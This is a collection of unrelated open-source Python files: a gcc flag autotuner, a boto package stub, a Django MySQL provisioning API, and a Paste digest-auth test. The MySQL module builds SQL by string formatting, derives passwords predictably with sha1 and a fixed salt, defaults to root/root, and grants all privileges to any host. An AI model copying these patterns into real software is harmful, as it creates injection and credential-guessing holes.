    cmd = args.compile_template.format(source=args.source, output=args.output,
                                       flags=flag, cc=args.cc)
    compile_result = self.call_program(cmd, limit=args.compile_limit)
    if compile_result['returncode'] != 0:
      log.warning("removing flag %s because it results in compile error", flag)
      return False
    if 'warning: this target' in compile_result['stderr']:
      log.warning("removing flag %s because not supported by target", flag)
      return False
    if 'has been renamed' in compile_result['stderr']:
      log.warning("removing flag %s because renamed", flag)
      return False
    # Both polarities must work, since the search may pick either one.
    if try_inverted and flag[:2] == '-f':
      if not self.check_if_flag_works(invert_gcc_flag(flag),
                                      try_inverted=False):
        log.warning("Odd... %s works but %s does not", flag,
                    invert_gcc_flag(flag))
        return False
    return True
  def manipulator(self):
    """Build the search space: -O level, on/off/default flags, numeric params."""
    m = manipulator.ConfigurationManipulator()
    m.add_parameter(manipulator.IntegerParameter('-O', 0, 3))
    for flag in self.cc_flags:
      m.add_parameter(manipulator.EnumParameter(flag, ['on', 'off', 'default']))
    for param in self.cc_params:
      defaults = self.cc_param_defaults[param]
      if defaults['max'] <= defaults['min']:
        defaults['max'] = float('inf')
      # Clamp the search range to default/scaler .. default*scaler.
      defaults['max'] = min(defaults['max'],
                            max(1, defaults['default']) * args.scaler)
      defaults['min'] = max(defaults['min'],
                            max(1, defaults['default']) / args.scaler)
      if param == 'l1-cache-line-size':
        # gcc requires this to be a power of two or it internal errors
        m.add_parameter(manipulator.PowerOfTwoParameter(param, 4, 256))
      elif defaults['max'] > 128:
        m.add_parameter(manipulator.LogIntegerParameter(
          param, defaults['min'], defaults['max']))
      else:
        m.add_parameter(manipulator.IntegerParameter(
          param, defaults['min'], defaults['max']))
    return m
  def cfg_to_flags(self, cfg):
    """Convert a configuration dict into a list of gcc command line flags."""
    flags = ['-O%d' % cfg['-O']]
    for flag in self.cc_flags:
      if cfg[flag] == 'on':
        flags.append(flag)
      elif cfg[flag] == 'off':
        flags.append(invert_gcc_flag(flag))
      # 'default' adds nothing: gcc's -O level decides.
    for param in self.cc_params:
      flags.append('--param=%s=%d' % (param, cfg[param]))
    # workaround sets of flags that trigger compiler crashes/hangs
    for bugset in self.cc_bugs:
      if len(set(bugset) & set(flags)) == len(bugset):
        flags.remove(bugset[-1])
    return flags
  def make_command(self, cfg):
    """Render the full compile command line for a configuration."""
    return args.compile_template.format(source=args.source, output=args.output,
                                        flags=' '.join(self.cfg_to_flags(cfg)),
                                        cc=args.cc)
  def get_tmpdir(self, result_id):
    """Per-result scratch directory used during parallel compilation."""
    return './tmp/%d' % result_id
  def cleanup(self, result_id):
    """Remove the scratch directory of a finished result."""
    tmp_dir = self.get_tmpdir(result_id)
    shutil.rmtree(tmp_dir)
  def run(self, desired_result, input, limit):
    # Unused: parallel_compile mode calls compile()/run_precompiled() instead.
    pass
  # Integer status codes returned by compile_with_flags() and consumed by
  # run_precompiled().
  compile_results = {'ok': 0, 'timeout': 1, 'error': 2}
  def run_precompiled(self, desired_result, input, limit, compile_result,
                      result_id):
    """Run an already-compiled binary and return a timed Result."""
    if self.args.force_killall:
      os.system('killall -9 cc1plus 2>/dev/null')
    # Make sure compile was successful
    if compile_result == self.compile_results['timeout']:
      return Result(state='TIMEOUT', time=float('inf'))
    elif compile_result == self.compile_results['error']:
      return Result(state='ERROR', time=float('inf'))
    tmp_dir = self.get_tmpdir(result_id)
    output_dir = '%s/%s' % (tmp_dir, args.output)
    try:
      run_result = self.call_program([output_dir], limit=limit,
                                     memory_limit=args.memory_limit)
    except OSError:
      return Result(state='ERROR', time=float('inf'))
    if run_result['returncode'] != 0:
      if run_result['timeout']:
        return Result(state='TIMEOUT', time=float('inf'))
      else:
        log.error('program error')
        return Result(state='ERROR', time=float('inf'))
    return Result(time=run_result['time'])
  def debug_gcc_error(self, flags):
    """When --debug is set, shrink ``flags`` to a small crash reproducer."""
    def fails(subflags):
      # True if gcc fails to compile with exactly these flags.
      cmd = args.compile_template.format(source=args.source, output=args.output,
                                         flags=' '.join(subflags),
                                         cc=args.cc)
      compile_result = self.call_program(cmd, limit=args.compile_limit)
      return compile_result['returncode'] != 0
    if self.args.debug:
      # Random bisection until the failing set is small enough to scan.
      while len(flags) > 8:
        log.error("compile error with %d flags, diagnosing...", len(flags))
        tmpflags = filter(lambda x: random.choice((True, False)), flags)
        if fails(tmpflags):
          flags = tmpflags
      # linear scan
      minimal_flags = []
      for i in xrange(len(flags)):
        tmpflags = minimal_flags + flags[i + 1:]
        if not fails(tmpflags):
          minimal_flags.append(flags[i])
      log.error("compiler crashes/hangs with flags: %s", minimal_flags)
  def compile(self, config_data, result_id):
    """Compile one configuration (intentionally shadows the builtin name:
    this is the MeasurementInterface hook for parallel compilation)."""
    flags = self.cfg_to_flags(config_data)
    return self.compile_with_flags(flags, result_id)
  def compile_with_flags(self, flags, result_id):
    """Compile into ./tmp/<result_id>/ and return a compile_results code."""
    tmp_dir = self.get_tmpdir(result_id)
    try:
      os.stat(tmp_dir)
    except OSError:
      os.mkdir(tmp_dir)
    output_dir = '%s/%s' % (tmp_dir, args.output)
    cmd = args.compile_template.format(source=args.source, output=output_dir,
                                       flags=' '.join(flags),
                                       cc=args.cc)
    compile_result = self.call_program(cmd, limit=args.compile_limit,
                                       memory_limit=args.memory_limit)
    if compile_result['returncode'] != 0:
      if compile_result['timeout']:
        log.warning("gcc timeout")
        return self.compile_results['timeout']
      else:
        log.warning("gcc error %s", compile_result['stderr'])
        self.debug_gcc_error(flags)
        return self.compile_results['error']
    return self.compile_results['ok']
  def run_with_flags(self, flags, limit):
    """Compile with an explicit flag list and run the result (slot 0)."""
    return self.run_precompiled(None, None, limit,
                                self.compile_with_flags(flags, 0), 0)
  def save_final_config(self, configuration):
    """called at the end of tuning"""
    print "Best flags written to gccflags_final_config.{json,cmd}"
    self.manipulator().save_to_file(configuration.data,
                                    'gccflags_final_config.json')
    with open('gccflags_final_config.cmd', 'w') as fd:
      fd.write(self.make_command(configuration.data))
  def flags_histogram(self, session):
    """Print how often each flag appears across completed tuning runs."""
    counter = collections.Counter()
    q = session.query(TuningRun).filter_by(state='COMPLETE')
    total = q.count()
    for tr in q:
      print tr.program.name
      for flag in self.cfg_to_flags(tr.final_config.data):
        counter[flag] += 1.0 / total
    print counter.most_common(20)
  def flag_importance(self):
    """
    Test the importance of each flag by measuring the performance with that
    flag removed.  Print out a table for paper
    """
    with open(self.args.flag_importance) as fd:
      best_cfg = json.load(fd)
    flags = self.cfg_to_flags(best_cfg)
    counter = collections.Counter()
    baseline_time = self.flags_mean_time(flags)
    # flags[0] is the -O level, which is never removed.
    for flag in flags[1:]:
      delta_flags = [f for f in flags if f != flag]
      flag_time = self.flags_mean_time(delta_flags)
      impact = max(0.0, flag_time - baseline_time)
      if math.isinf(impact):
        impact = 0.0
      counter[flag] = impact
      print flag, '{:.4f}'.format(impact)
    total_impact = sum(counter.values())
    remaining_impact = total_impact
    # LaTeX table output.
    print r'\bf Flag & \bf Importance \\\hline'
    for flag, impact in counter.most_common(20):
      print r'{} & {:.1f}\% \\\hline'.format(flag, 100.0 * impact / total_impact)
      remaining_impact -= impact
    print r'{} other flags & {:.1f}% \\\hline'.format(
      len(flags) - 20, 100.0 * remaining_impact / total_impact)
  def flags_mean_time(self, flags, trials=10):
    """Average run time of one precompiled binary over ``trials`` runs."""
    precompiled = self.compile_with_flags(flags, 0)
    total = 0.0
    for _ in xrange(trials):
      total += self.run_precompiled(None, None, None, precompiled, 0).time
    return total / trials
  def prefix_hook(self, session):
    """Handle the --flags-histogram / --flag-importance modes, then exit."""
    if self.args.flags_histogram:
      self.flags_histogram(session)
      sys.exit(0)
    if self.args.flag_importance:
      self.flag_importance()
      sys.exit(0)
def invert_gcc_flag(flag):
  """Return the negated form of a gcc -f flag ('-ffoo' <-> '-fno-foo')."""
  assert flag.startswith('-f')
  body = flag[2:]
  if body.startswith('no-'):
    return '-f' + body[3:]
  return '-fno-' + body
if __name__ == '__main__':
  opentuner.init_logging()
  # ``args`` is module-global: GccFlagsTuner and the helpers read it directly.
  args = argparser.parse_args()
  GccFlagsTuner.main(args)
| mit |
alex/boto | tests/integration/route53/domains/__init__.py | 113 | 1122 | # Copyright (c) 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
| mit |
badri/mysqlapi | mysqlapi/api/models.py | 1 | 8285 | # Copyright 2013 mysqlapi authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import hashlib
import os
import re
import subprocess
import MySQLdb
from django.conf import settings
from django.db import models
from mysqlapi.api import creator
from mysqlapi.api.database import Connection
class InvalidInstanceName(Exception):
    """Raised when a requested instance name is reserved or not allowed."""

    def __init__(self, name):
        # Bug fix: the original stored the raw format string without ever
        # interpolating ``name`` (compare InstanceAlreadyExists below).
        self.args = [u"%s is a invalid name." % name]
class InstanceAlreadyExists(Exception):
    """Raised when creating a database instance whose name is already taken."""

    def __init__(self, name):
        message = u"Instance %s already exists." % name
        self.args = [message]
class DatabaseCreationError(Exception):
    """Raised (usually with (instance, reason)) when provisioning fails."""
    pass
def generate_password(string):
    """Return a deterministic sha1 hex digest of ``string`` + the site salt.

    NOTE(review): passwords derived deterministically from the username and a
    fixed salt are predictable, and sha1 is weak for this purpose — confirm
    whether this is acceptable for the deployment.
    """
    return hashlib.sha1(string + settings.SALT).hexdigest()
def generate_user(username):
    """Return a MySQL-safe user name no longer than 16 characters."""
    if len(username) <= 16:
        return username
    # MySQL limits user names to 16 chars: keep a 12-char prefix and
    # disambiguate with 4 chars of the derived password hash.
    return username[:12] + generate_password(username)[:4]
class DatabaseManager(object):
    """Thin wrapper around a MySQL connection for one named database.

    NOTE(review): SQL statements below are built with string formatting on
    ``self.name``/``username``; names pass through canonicalize_db_name(),
    but this is still not proper parameterization — verify inputs are
    trusted.
    """
    def __init__(self,
                 name,
                 host="localhost",
                 port="3306",
                 user="root",
                 password="root",
                 public_host=None):
        self.name = canonicalize_db_name(name)
        self._host = host
        self.port = port
        self.conn = Connection(self._host, self.port, user, password, "")
        self._public_host = public_host
    @property
    def public_host(self):
        # Externally visible hostname; falls back to the connection host.
        if self._public_host:
            return self._public_host
        return self.host
    def create_database(self):
        """Create the managed database with utf8/utf8_general_ci defaults."""
        self.conn.open()
        cursor = self.conn.cursor()
        sql = "CREATE DATABASE %s default character set utf8 " + \
              "default collate utf8_general_ci"
        cursor.execute(sql % self.name)
        self.conn.close()
    def drop_database(self):
        """Drop the managed database."""
        self.conn.open()
        cursor = self.conn.cursor()
        cursor.execute("DROP DATABASE %s" % self.name)
        self.conn.close()
    def create_user(self, username, host):
        """Create a MySQL user with full privileges on this database.

        Returns the (possibly truncated) username and its derived password.
        NOTE(review): the ``host`` parameter is unused — grants use '%'.
        """
        self.conn.open()
        cursor = self.conn.cursor()
        username = generate_user(username)
        password = generate_password(username)
        sql = ("grant all privileges on {0}.* to '{1}'@'%'"
               " identified by '{2}'")
        cursor.execute(sql.format(self.name, username, password))
        self.conn.close()
        return username, password
    def drop_user(self, username, host):
        """Drop the given MySQL user (``host`` parameter is unused)."""
        self.conn.open()
        cursor = self.conn.cursor()
        cursor.execute("drop user '{0}'@'%'".format(username))
        self.conn.close()
    def export(self):
        """Return a schema-only (-d) mysqldump of the database."""
        cmd = ["mysqldump", "-u", "root", "-d", self.name, "--compact"]
        return subprocess.check_output(cmd, stderr=subprocess.STDOUT)
    def is_up(self):
        """Return True if a connection can be opened to the server."""
        try:
            self.conn.open()
            return True
        except:
            # NOTE(review): bare except treats any failure as "down",
            # including programming errors — consider narrowing.
            return False
        finally:
            self.conn.close()
    @property
    def host(self):
        # "localhost" may be overridden through the environment so the API
        # can point at a different local database host.
        if self._host == "localhost":
            return os.environ.get("MYSQLAPI_DATABASE_HOST", "localhost")
        return self._host
class Instance(models.Model):
    """Database instance record: either shared, pooled, or EC2-dedicated."""
    STATE_CHOICES = (
        ("pending", "pending"),
        ("running", "running"),
        ("error", "error"),
    )
    name = models.CharField(max_length=100, unique=True)
    # EC2 instance id; only set for dedicated instances.
    ec2_id = models.CharField(max_length=100, null=True, blank=True)
    state = models.CharField(max_length=50,
                             default="pending",
                             choices=STATE_CHOICES)
    # Human-readable explanation for an "error" state.
    reason = models.CharField(max_length=1000,
                              null=True,
                              blank=True,
                              default=None)
    host = models.CharField(max_length=50, null=True, blank=True)
    port = models.CharField(max_length=5, default="3306")
    # True when the database lives on the shared MySQL server.
    shared = models.BooleanField(default=False)
    def is_up(self):
        """Return True if the instance is running and its server answers."""
        return self.state == "running" and self.db_manager().is_up()
    def db_manager(self):
        """Build a DatabaseManager with credentials matching this instance.

        Shared instances use the settings-level shared credentials; pooled
        instances use their ProvisionedInstance admin credentials; anything
        else falls back to root with an empty password.
        """
        host = self.host
        port = self.port
        user = "root"
        password = ""
        public_host = None
        if self.shared:
            host = settings.SHARED_SERVER
            user = settings.SHARED_USER
            password = settings.SHARED_PASSWORD
            public_host = settings.SHARED_SERVER_PUBLIC_HOST
        elif ProvisionedInstance.objects.filter(instance=self).exists():
            pi = ProvisionedInstance.objects.get(instance=self)
            user = pi.admin_user
            password = pi.admin_password
        return DatabaseManager(self.name,
                               host=host,
                               port=port,
                               user=user,
                               password=password,
                               public_host=public_host)
class ProvisionedInstance(models.Model):
    """A pre-provisioned MySQL server slot that can be bound to an Instance.

    ``instance`` is NULL while the slot is free; alloc()/dealloc() bind and
    release it.
    """
    instance = models.ForeignKey(Instance, null=True, blank=True, unique=True)
    host = models.CharField(max_length=500)
    port = models.IntegerField(default=3306)
    admin_user = models.CharField(max_length=255, default="root")
    admin_password = models.CharField(max_length=255, blank=True)
    def _manager(self, name=None):
        # Lazily build and cache a DatabaseManager using the slot's admin
        # credentials.  NOTE(review): the ``name`` parameter is unused.
        if not hasattr(self, "_db_manager"):
            self._db_manager = DatabaseManager(name=self.instance.name,
                                               host=self.host,
                                               port=self.port,
                                               user=self.admin_user,
                                               password=self.admin_password)
        return self._db_manager
    def alloc(self, instance):
        """Bind ``instance`` to this slot and create its database.

        Raises TypeError if the slot is already taken and
        DatabaseCreationError if the CREATE DATABASE fails.
        """
        if self.instance:
            raise TypeError("This instance is not available")
        # Assign before _manager() runs so it can read instance.name.
        self.instance = instance
        try:
            self._manager().create_database()
        except Exception as exc:
            raise DatabaseCreationError(*exc.args)
        instance.host = self.host
        instance.port = str(self.port)
        instance.shared = False
        instance.ec2_id = None
        instance.state = "running"
        instance.save()
        self.instance = instance
        self.save()
    def dealloc(self):
        """Drop the bound database and return this slot to the free pool."""
        if not self.instance:
            raise TypeError("This instance is not allocated")
        self._manager().drop_database()
        self.instance.state = "stopped"
        self.instance = None
        self.save()
def create_database(instance, ec2_client=None):
    """Validate the instance name and dispatch to a provisioning strategy.

    Strategy order: shared server, then the pre-provisioned pool, then a
    dedicated EC2 instance.  Raises InvalidInstanceName for reserved names
    and InstanceAlreadyExists for duplicates.
    """
    instance.name = canonicalize_db_name(instance.name)
    if instance.name in settings.RESERVED_NAMES:
        raise InvalidInstanceName(name=instance.name)
    if Instance.objects.filter(name=instance.name):
        raise InstanceAlreadyExists(name=instance.name)
    if settings.SHARED_SERVER:
        return _create_shared_database(instance)
    elif settings.USE_POOL:
        return _create_from_pool(instance)
    else:
        return _create_dedicate_database(instance, ec2_client)
def _create_shared_database(instance):
    """Create the database on the shared MySQL server and mark it running."""
    db = DatabaseManager(
        name=instance.name,
        host=settings.SHARED_SERVER,
        user=settings.SHARED_USER,
        password=settings.SHARED_PASSWORD,
    )
    try:
        db.create_database()
    except MySQLdb.ProgrammingError as e:
        # Translate MySQL's "database exists" into the domain exception;
        # anything else propagates unchanged.
        if len(e.args) > 1 and "database exists" in e.args[1]:
            raise InstanceAlreadyExists(name=instance.name)
        raise
    instance.state = "running"
    instance.shared = True
    instance.ec2_id = None
    instance.save()
def _create_from_pool(instance):
    """Allocate the first free pre-provisioned slot for ``instance``."""
    # [:1] keeps the query lazy and limits it to a single candidate row.
    provisioned_instance = ProvisionedInstance.objects.filter(
        instance__isnull=True)[:1]
    if not provisioned_instance:
        raise DatabaseCreationError(instance,
                                    "No free instances available in the pool")
    provisioned_instance[0].alloc(instance)
def _create_dedicate_database(instance, ec2_client):
    """Start a dedicated EC2 instance and queue it for database setup."""
    if not ec2_client.run(instance):
        raise DatabaseCreationError(instance,
                                    "Failed to create EC2 instance.")
    instance.save()
    # The creator worker finishes provisioning asynchronously.
    creator.enqueue(instance)
def canonicalize_db_name(name):
    """Replace unsafe characters with '_' and append a short hash suffix.

    Names containing only word characters are returned unchanged.  The
    10-hex-char sha1 suffix keeps distinct raw names from collapsing onto
    the same canonical name after substitution.
    """
    if re.search(r"[\W\s]", name) is None:
        return name
    suffix = hashlib.sha1(name).hexdigest()[:10]
    return re.sub(r"[\W\s]", "_", name) + suffix
| bsd-3-clause |
jjmleiro/hue | desktop/core/ext-py/Paste-2.0.1/tests/test_auth/test_auth_digest.py | 47 | 3076 | # (c) 2005 Clark C. Evans
# This module is part of the Python Paste Project and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from paste.auth.digest import *
from paste.wsgilib import raw_interactive
from paste.httpexceptions import *
from paste.httpheaders import AUTHORIZATION, WWW_AUTHENTICATE, REMOTE_USER
import os
import six
def application(environ, start_response):
    """Trivial WSGI app echoing the authenticated user name back as the body."""
    content = REMOTE_USER(environ)
    start_response("200 OK",(('Content-Type', 'text/plain'),
                    ('Content-Length', len(content))))
    # WSGI bodies must be bytes on Python 3.
    if six.PY3:
        content = content.encode('utf8')
    return [content]
realm = "tag:clarkevans.com,2005:testing"
def backwords(environ, realm, username):
    """ dummy password hash, where user password is just reverse """
    # Slice-reversal replaces the list/reverse/join dance; same result.
    password = username[::-1]
    return digest_password(realm, username, password)
# Wrap the demo app with digest authentication and exception-to-HTTP-error
# translation; ``application`` now names the fully wrapped WSGI stack.
application = AuthDigestHandler(application,realm,backwords)
application = HTTPExceptionHandler(application)
def check(username, password, path="/"):
    """ perform two-stage authentication to verify login

    Returns the response body on success, None on a 401 rejection.
    """
    # Stage 1: unauthenticated request must be challenged with a 401.
    (status,headers,content,errors) = \
        raw_interactive(application,path, accept='text/html')
    assert status.startswith("401")
    challenge = WWW_AUTHENTICATE(headers)
    # Stage 2: answer the digest challenge and retry.
    response = AUTHORIZATION(username=username, password=password,
                             challenge=challenge, path=path)
    assert "Digest" in response and username in response
    (status,headers,content,errors) = \
        raw_interactive(application,path,
                        HTTP_AUTHORIZATION=response)
    if status.startswith("200"):
        return content
    if status.startswith("401"):
        return None
    assert False, "Unexpected Status: %s" % status
def test_digest():
    """Reversed password authenticates; a wrong password is rejected."""
    assert b'bing' == check("bing","gnib")
    assert check("bing","bad") is None
#
# The following code uses sockets to test the functionality,
# to enable use:
#
# $ TEST_SOCKET py.test
#
if os.environ.get("TEST_SOCKET",""):
    from six.moves.urllib.error import HTTPError
    from six.moves.urllib.request import build_opener, HTTPDigestAuthHandler
    from paste.debug.testserver import serve
    # Real socket-backed server running the wrapped WSGI application.
    server = serve(application)
    def authfetch(username,password,path="/",realm=realm):
        """Fetch ``path`` through urllib's digest auth handler."""
        server.accept(2)
        import socket
        socket.setdefaulttimeout(5)
        uri = ("http://%s:%s" % server.server_address) + path
        auth = HTTPDigestAuthHandler()
        auth.add_password(realm,uri,username,password)
        opener = build_opener(auth)
        result = opener.open(uri)
        return result.read()
    def test_success():
        # Correct (reversed) password round-trips over a real socket.
        assert "bing" == authfetch('bing','gnib')
    def test_failure():
        # urllib tries 5 more times before it gives up
        server.accept(5)
        try:
            authfetch('bing','wrong')
            assert False, "this should raise an exception"
        except HTTPError as e:
            assert e.code == 401
    def test_shutdown():
        # Stop the background server so the test process can exit.
        server.stop()
| apache-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.